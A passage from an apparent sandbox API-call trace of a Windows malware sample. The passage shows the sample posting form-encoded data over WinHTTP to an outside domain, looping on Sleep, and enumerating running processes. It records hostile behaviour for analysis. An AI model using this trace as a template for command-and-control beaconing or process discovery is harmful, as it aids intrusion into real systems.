Seed=0x2830e9e) returned 0x2ea01bce [0318.299] wsprintfW (in: param_1=0x7d41cf0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://lcjjpo.net/") returned 40 [0318.299] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41e30) returned 0x17 [0318.299] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41e30) returned 1 [0318.299] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41e10) returned 0x12 [0318.299] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41e10) returned 1 [0318.299] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c90) returned 0x4e [0318.299] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c90) returned 1 [0318.299] WinHttpAddRequestHeaders (hRequest=0xa9f01f0, pwszHeaders="Accept: */*\r\nReferer: http://lcjjpo.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0318.299] WinHttpSendRequest (hRequest=0xa9f01f0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7d41980*, dwOptionalLength=0x146, dwTotalLength=0x146, dwContext=0x0) returned 0 [0318.447] WinHttpCloseHandle (hInternet=0xa9f01f0) returned 1 [0318.447] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41cf0) returned 0x10d [0318.447] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41cf0) returned 1 [0318.447] WinHttpCloseHandle (hInternet=0x8773d80) returned 1 [0318.447] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c20) returned 0x68 [0318.447] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c20) returned 1 [0318.447] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c00) returned 0x12 [0318.448] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c00) returned 1 [0318.448] WinHttpCloseHandle (hInternet=0xac7a1c0) returned 1 [0318.448] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41ae0) returned 0x10c [0318.448] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41ae0) returned 1 [0318.448] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41870) returned 0x100 [0318.448] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41870) returned 1 [0318.448] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41980) returned 0x14f [0318.448] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41980) returned 1 [0318.448] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x1d [0318.448] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0318.448] Sleep (dwMilliseconds=0x258) [0318.450] Sleep (dwMilliseconds=0x258) [0318.451] Sleep (dwMilliseconds=0x258) [0318.453] Sleep (dwMilliseconds=0x258) [0318.454] Sleep (dwMilliseconds=0x258) [0318.456] Sleep (dwMilliseconds=0x258) [0318.458] Sleep (dwMilliseconds=0x258) [0318.460] Sleep (dwMilliseconds=0x258) [0318.461] Sleep (dwMilliseconds=0x258) [0318.463] Sleep (dwMilliseconds=0x258) [0318.464] Sleep (dwMilliseconds=0x258) [0318.466] Sleep (dwMilliseconds=0x258) [0318.467] Sleep (dwMilliseconds=0x258) [0318.469] Sleep (dwMilliseconds=0x258) [0318.472] Sleep (dwMilliseconds=0x258) [0318.474] Sleep (dwMilliseconds=0x258) [0318.475] Sleep (dwMilliseconds=0x258) [0318.477] Sleep (dwMilliseconds=0x258) [0318.479] Sleep (dwMilliseconds=0x258) [0318.480] Sleep (dwMilliseconds=0x258) [0318.482] Sleep (dwMilliseconds=0x258) [0318.483] Sleep (dwMilliseconds=0x258) [0318.485] Sleep (dwMilliseconds=0x258) [0318.486] Sleep (dwMilliseconds=0x258) [0318.489] Sleep (dwMilliseconds=0x258) [0318.491] Sleep (dwMilliseconds=0x258) [0318.492] Sleep (dwMilliseconds=0x258) [0318.494] Sleep (dwMilliseconds=0x258) [0318.497] Sleep (dwMilliseconds=0x258) [0318.498] Sleep (dwMilliseconds=0x258) [0318.500] Sleep (dwMilliseconds=0x258) [0318.501] Sleep (dwMilliseconds=0x258) [0318.503] Sleep (dwMilliseconds=0x258) [0318.507] Sleep (dwMilliseconds=0x258) [0318.508] Sleep (dwMilliseconds=0x258) [0318.510] Sleep (dwMilliseconds=0x258) [0318.512] Sleep (dwMilliseconds=0x258) [0318.513] Sleep (dwMilliseconds=0x258) [0318.515] Sleep (dwMilliseconds=0x258) [0318.516] Sleep (dwMilliseconds=0x258) [0318.518] Sleep (dwMilliseconds=0x258) [0318.519] Sleep (dwMilliseconds=0x258) [0318.521] Sleep (dwMilliseconds=0x258) [0318.524] Sleep (dwMilliseconds=0x258) [0318.525] Sleep (dwMilliseconds=0x258) [0318.527] Sleep (dwMilliseconds=0x258) [0318.529] Sleep (dwMilliseconds=0x258) [0318.530] Sleep (dwMilliseconds=0x258) [0318.532] Sleep (dwMilliseconds=0x258) [0318.534] Sleep (dwMilliseconds=0x258) [0318.535] Sleep (dwMilliseconds=0x258) [0318.537] Sleep (dwMilliseconds=0x258) [0318.538] Sleep (dwMilliseconds=0x258) [0318.540] Sleep (dwMilliseconds=0x258) [0318.542] Sleep (dwMilliseconds=0x258) [0318.544] Sleep (dwMilliseconds=0x258) [0318.545] Sleep (dwMilliseconds=0x258) [0318.547] Sleep (dwMilliseconds=0x258) [0318.548] Sleep (dwMilliseconds=0x258) [0318.550] Sleep (dwMilliseconds=0x258) [0318.552] Sleep (dwMilliseconds=0x258) [0318.553] Sleep (dwMilliseconds=0x258) [0318.555] Sleep (dwMilliseconds=0x258) [0318.556] Sleep (dwMilliseconds=0x258) [0318.558] Sleep (dwMilliseconds=0x258) [0318.559] Sleep (dwMilliseconds=0x258) [0318.561] Sleep (dwMilliseconds=0x258) [0318.562] Sleep (dwMilliseconds=0x258) [0318.564] Sleep (dwMilliseconds=0x258) [0318.565] Sleep (dwMilliseconds=0x258) [0318.567] Sleep (dwMilliseconds=0x258) [0318.568] Sleep (dwMilliseconds=0x258) [0318.570] Sleep (dwMilliseconds=0x258) [0318.571] Sleep (dwMilliseconds=0x258) [0318.573] Sleep (dwMilliseconds=0x258) [0318.575] Sleep (dwMilliseconds=0x258) [0318.576] Sleep (dwMilliseconds=0x258) [0318.578] Sleep (dwMilliseconds=0x258) [0318.579] Sleep (dwMilliseconds=0x258) [0318.581] Sleep (dwMilliseconds=0x258) [0318.583] Sleep (dwMilliseconds=0x258) [0318.585] Sleep (dwMilliseconds=0x258) [0318.587] Sleep (dwMilliseconds=0x258) [0318.589] Sleep (dwMilliseconds=0x258) [0318.590] Sleep (dwMilliseconds=0x258) [0318.593] Sleep (dwMilliseconds=0x258) [0318.594] Sleep (dwMilliseconds=0x258) [0318.596] Sleep (dwMilliseconds=0x258) [0318.598] Sleep (dwMilliseconds=0x258) [0318.600] Sleep (dwMilliseconds=0x258) [0318.601] Sleep (dwMilliseconds=0x258) [0318.603] Sleep (dwMilliseconds=0x258) [0318.605] Sleep (dwMilliseconds=0x258) [0318.607] Sleep (dwMilliseconds=0x258) [0318.609] Sleep (dwMilliseconds=0x258) [0318.610] Sleep (dwMilliseconds=0x258) [0318.612] Sleep (dwMilliseconds=0x258) [0318.613] Sleep (dwMilliseconds=0x258) [0318.615] Sleep (dwMilliseconds=0x258) [0318.616] Sleep (dwMilliseconds=0x258) [0318.618] Sleep (dwMilliseconds=0x258) [0318.619] Sleep (dwMilliseconds=0x258) [0318.621] Sleep (dwMilliseconds=0x258) [0318.622] Sleep (dwMilliseconds=0x258) [0318.624] Sleep (dwMilliseconds=0x258) [0318.625] Sleep (dwMilliseconds=0x258) [0318.627] Sleep (dwMilliseconds=0x258) [0318.629] Sleep (dwMilliseconds=0x258) [0318.630] Sleep (dwMilliseconds=0x258) [0318.632] Sleep (dwMilliseconds=0x258) [0318.633] Sleep (dwMilliseconds=0x258) [0318.635] Sleep (dwMilliseconds=0x258) [0318.636] Sleep (dwMilliseconds=0x258) [0318.638] Sleep (dwMilliseconds=0x258) [0318.639] Sleep (dwMilliseconds=0x258) [0318.641] Sleep (dwMilliseconds=0x258) [0318.643] Sleep (dwMilliseconds=0x258) [0318.644] Sleep (dwMilliseconds=0x258) [0318.646] Sleep (dwMilliseconds=0x258) [0318.647] Sleep (dwMilliseconds=0x258) [0318.649] Sleep (dwMilliseconds=0x258) [0318.650] Sleep (dwMilliseconds=0x258) [0318.653] Sleep (dwMilliseconds=0x258) [0318.655] Sleep (dwMilliseconds=0x258) [0318.656] Sleep (dwMilliseconds=0x258) [0318.658] Sleep (dwMilliseconds=0x258) [0318.659] Sleep (dwMilliseconds=0x258) [0318.661] Sleep (dwMilliseconds=0x258) [0318.662] Sleep (dwMilliseconds=0x258) [0318.664] Sleep (dwMilliseconds=0x258) [0318.665] Sleep (dwMilliseconds=0x258) [0318.667] Sleep (dwMilliseconds=0x258) [0318.669] Sleep (dwMilliseconds=0x258) [0318.670] Sleep (dwMilliseconds=0x258) [0318.672] Sleep (dwMilliseconds=0x258) [0318.674] Sleep (dwMilliseconds=0x258) [0318.676] Sleep (dwMilliseconds=0x258) [0318.678] Sleep (dwMilliseconds=0x258) [0318.679] Sleep (dwMilliseconds=0x258) [0318.681] Sleep (dwMilliseconds=0x258) [0318.683] Sleep (dwMilliseconds=0x258) [0318.685] Sleep (dwMilliseconds=0x258) [0318.686] Sleep (dwMilliseconds=0x258) [0318.688] Sleep (dwMilliseconds=0x258) [0318.689] Sleep (dwMilliseconds=0x258) [0318.692] Sleep (dwMilliseconds=0x258) [0318.693] Sleep (dwMilliseconds=0x258) [0318.696] Sleep (dwMilliseconds=0x258) [0318.698] Sleep (dwMilliseconds=0x258) [0318.700] Sleep (dwMilliseconds=0x258) [0318.701] Sleep (dwMilliseconds=0x258) [0318.704] Sleep (dwMilliseconds=0x258) [0318.705] Sleep (dwMilliseconds=0x258) [0318.707] Sleep (dwMilliseconds=0x258) [0318.708] Sleep (dwMilliseconds=0x258) [0318.710] Sleep (dwMilliseconds=0x258) [0318.711] Sleep (dwMilliseconds=0x258) [0318.713] Sleep (dwMilliseconds=0x258) [0318.714] Sleep (dwMilliseconds=0x258) [0318.716] Sleep (dwMilliseconds=0x258) [0318.717] Sleep (dwMilliseconds=0x258) [0318.719] Sleep (dwMilliseconds=0x258) [0318.720] Sleep (dwMilliseconds=0x258) [0318.722] Sleep (dwMilliseconds=0x258) [0318.723] Sleep (dwMilliseconds=0x258) [0318.725] Sleep (dwMilliseconds=0x258) [0318.726] Sleep (dwMilliseconds=0x258) [0318.728] Sleep (dwMilliseconds=0x258) [0318.731] Sleep (dwMilliseconds=0x258) [0318.734] Sleep (dwMilliseconds=0x258) [0318.735] Sleep (dwMilliseconds=0x258) [0318.737] Sleep (dwMilliseconds=0x258) [0318.738] Sleep (dwMilliseconds=0x258) [0318.740] Sleep (dwMilliseconds=0x258) [0318.904] Sleep (dwMilliseconds=0x258) [0318.905] Sleep (dwMilliseconds=0x258) [0318.907] Sleep (dwMilliseconds=0x258) [0318.908] Sleep (dwMilliseconds=0x258) [0318.910] Sleep (dwMilliseconds=0x258) [0318.912] Sleep (dwMilliseconds=0x258) [0318.914] Sleep (dwMilliseconds=0x258) [0318.916] Sleep (dwMilliseconds=0x258) [0318.917] Sleep (dwMilliseconds=0x258) [0318.919] Sleep (dwMilliseconds=0x258) [0318.920] Sleep (dwMilliseconds=0x258) [0318.922] Sleep (dwMilliseconds=0x258) [0318.923] Sleep (dwMilliseconds=0x258) [0318.925] Sleep (dwMilliseconds=0x258) [0318.926] Sleep (dwMilliseconds=0x258) [0318.928] Sleep (dwMilliseconds=0x258) [0318.929] Sleep (dwMilliseconds=0x258) [0318.931] Sleep (dwMilliseconds=0x258) [0318.932] Sleep (dwMilliseconds=0x258) [0318.934] Sleep (dwMilliseconds=0x258) [0318.935] Sleep (dwMilliseconds=0x258) [0318.937] Sleep (dwMilliseconds=0x258) [0318.938] Sleep (dwMilliseconds=0x258) [0318.940] Sleep (dwMilliseconds=0x258) [0318.941] Sleep (dwMilliseconds=0x258) [0318.943] Sleep (dwMilliseconds=0x258) [0318.944] Sleep (dwMilliseconds=0x258) [0318.946] Sleep (dwMilliseconds=0x258) [0318.949] Sleep (dwMilliseconds=0x258) [0318.950] Sleep (dwMilliseconds=0x258) [0318.952] Sleep (dwMilliseconds=0x258) [0318.961] Sleep (dwMilliseconds=0x258) [0318.962] Sleep (dwMilliseconds=0x258) [0318.964] Sleep (dwMilliseconds=0x258) [0318.965] Sleep (dwMilliseconds=0x258) [0318.967] Sleep (dwMilliseconds=0x258) [0318.968] Sleep (dwMilliseconds=0x258) [0318.970] Sleep (dwMilliseconds=0x258) [0318.972] Sleep (dwMilliseconds=0x258) [0318.974] Sleep (dwMilliseconds=0x258) [0318.975] Sleep (dwMilliseconds=0x258) [0318.977] Sleep (dwMilliseconds=0x258) [0318.979] Sleep (dwMilliseconds=0x258) [0318.980] Sleep (dwMilliseconds=0x258) [0318.985] Sleep (dwMilliseconds=0x258) [0318.986] Sleep (dwMilliseconds=0x258) [0318.987] Sleep (dwMilliseconds=0x258) [0318.989] Sleep (dwMilliseconds=0x258) [0318.991] Sleep (dwMilliseconds=0x258) [0318.993] Sleep (dwMilliseconds=0x258) [0318.994] Sleep (dwMilliseconds=0x258) [0318.996] Sleep (dwMilliseconds=0x258) [0318.998] Sleep (dwMilliseconds=0x258) [0318.999] Sleep (dwMilliseconds=0x258) [0319.001] Sleep (dwMilliseconds=0x258) [0319.003] Sleep (dwMilliseconds=0x258) [0319.004] Sleep (dwMilliseconds=0x258) [0319.006] Sleep (dwMilliseconds=0x258) [0319.008] Sleep (dwMilliseconds=0x258) [0319.010] Sleep (dwMilliseconds=0x258) [0319.011] Sleep (dwMilliseconds=0x258) [0319.013] Sleep (dwMilliseconds=0x258) [0319.015] Sleep (dwMilliseconds=0x258) [0319.027] Sleep (dwMilliseconds=0x258) [0319.051] Sleep (dwMilliseconds=0x258) [0319.091] Sleep (dwMilliseconds=0x258) [0319.134] Sleep (dwMilliseconds=0x258) [0319.186] Sleep (dwMilliseconds=0x258) [0319.210] Sleep (dwMilliseconds=0x258) [0319.212] Sleep (dwMilliseconds=0x258) [0319.232] Sleep (dwMilliseconds=0x258) [0319.275] Sleep (dwMilliseconds=0x258) [0319.338] Sleep (dwMilliseconds=0x258) [0319.357] Sleep (dwMilliseconds=0x258) [0319.359] Sleep (dwMilliseconds=0x258) [0319.392] Sleep (dwMilliseconds=0x258) [0319.429] Sleep (dwMilliseconds=0x258) [0319.456] Sleep (dwMilliseconds=0x258) [0319.469] Sleep (dwMilliseconds=0x258) [0319.510] Sleep (dwMilliseconds=0x258) [0319.549] Sleep (dwMilliseconds=0x258) [0319.568] Sleep (dwMilliseconds=0x258) [0319.614] Sleep (dwMilliseconds=0x258) [0319.651] Sleep (dwMilliseconds=0x258) [0319.682] Sleep (dwMilliseconds=0x258) [0319.685] Sleep (dwMilliseconds=0x258) [0319.694] Sleep (dwMilliseconds=0x258) [0319.747] Sleep (dwMilliseconds=0x258) [0319.916] Sleep (dwMilliseconds=0x258) [0319.924] Sleep (dwMilliseconds=0x258) [0319.998] Sleep (dwMilliseconds=0x258) [0320.037] Sleep (dwMilliseconds=0x258) [0320.054] Sleep (dwMilliseconds=0x258) [0320.056] Sleep (dwMilliseconds=0x258) [0320.095] Sleep (dwMilliseconds=0x258) [0320.133] Sleep (dwMilliseconds=0x258) [0320.178] Sleep (dwMilliseconds=0x258) [0320.189] Sleep (dwMilliseconds=0x258) [0320.228] Sleep (dwMilliseconds=0x258) [0320.269] Sleep (dwMilliseconds=0x258) [0320.289] Sleep (dwMilliseconds=0x258) [0320.290] Sleep (dwMilliseconds=0x258) [0320.312] Sleep (dwMilliseconds=0x258) [0320.356] Sleep (dwMilliseconds=0x258) [0320.440] Sleep (dwMilliseconds=0x258) [0320.493] Sleep (dwMilliseconds=0x258) [0320.499] Sleep (dwMilliseconds=0x258) [0320.538] Sleep (dwMilliseconds=0x258) [0320.577] Sleep (dwMilliseconds=0x258) [0320.585] Sleep (dwMilliseconds=0x258) [0320.616] Sleep (dwMilliseconds=0x258) [0320.654] Sleep (dwMilliseconds=0x258) [0320.691] Sleep (dwMilliseconds=0x258) [0320.694] Sleep (dwMilliseconds=0x258) [0320.733] Sleep (dwMilliseconds=0x258) [0320.773] Sleep (dwMilliseconds=0x258) [0320.878] Sleep (dwMilliseconds=0x258) [0320.925] Sleep (dwMilliseconds=0x258) [0320.932] Sleep (dwMilliseconds=0x258) [0320.970] Sleep (dwMilliseconds=0x258) [0321.007] Sleep (dwMilliseconds=0x258) [0321.037] Sleep (dwMilliseconds=0x258) [0321.039] Sleep (dwMilliseconds=0x258) [0321.047] Sleep (dwMilliseconds=0x258) [0321.090] Sleep (dwMilliseconds=0x258) [0321.172] Sleep (dwMilliseconds=0x258) [0321.175] Sleep (dwMilliseconds=0x258) [0321.177] Sleep (dwMilliseconds=0x258) [0321.212] Sleep (dwMilliseconds=0x258) [0321.249] Sleep (dwMilliseconds=0x258) [0321.274] Sleep (dwMilliseconds=0x258) [0321.276] Sleep (dwMilliseconds=0x258) [0321.294] Sleep (dwMilliseconds=0x258) [0321.331] Sleep (dwMilliseconds=0x258) [0321.369] Sleep (dwMilliseconds=0x258) [0321.392] Sleep (dwMilliseconds=0x258) [0321.418] Sleep (dwMilliseconds=0x258) [0321.456] Sleep (dwMilliseconds=0x258) [0321.498] Sleep (dwMilliseconds=0x258) [0321.506] Sleep (dwMilliseconds=0x258) [0321.508] Sleep (dwMilliseconds=0x258) [0321.546] Sleep (dwMilliseconds=0x258) [0321.589] Sleep (dwMilliseconds=0x258) [0321.626] Sleep (dwMilliseconds=0x258) [0321.632] Sleep (dwMilliseconds=0x258) [0321.634] Sleep (dwMilliseconds=0x258) [0321.669] Sleep (dwMilliseconds=0x258) [0321.709] Sleep (dwMilliseconds=0x258) [0321.748] Sleep (dwMilliseconds=0x258) [0321.750] Sleep (dwMilliseconds=0x258) [0321.758] Sleep (dwMilliseconds=0x258) Thread: id = 54 os_tid = 0x1390 [0145.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fa8 [0145.708] Process32First (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.710] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.711] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.714] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.717] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.719] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.721] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.749] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.752] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.754] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.756] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.758] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.760] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.762] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.765] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.767] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.768] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.770] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.771] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.773] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.775] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0145.776] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.778] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0145.779] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.782] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0145.784] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0145.789] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0145.791] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0145.792] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0145.794] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0145.795] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, 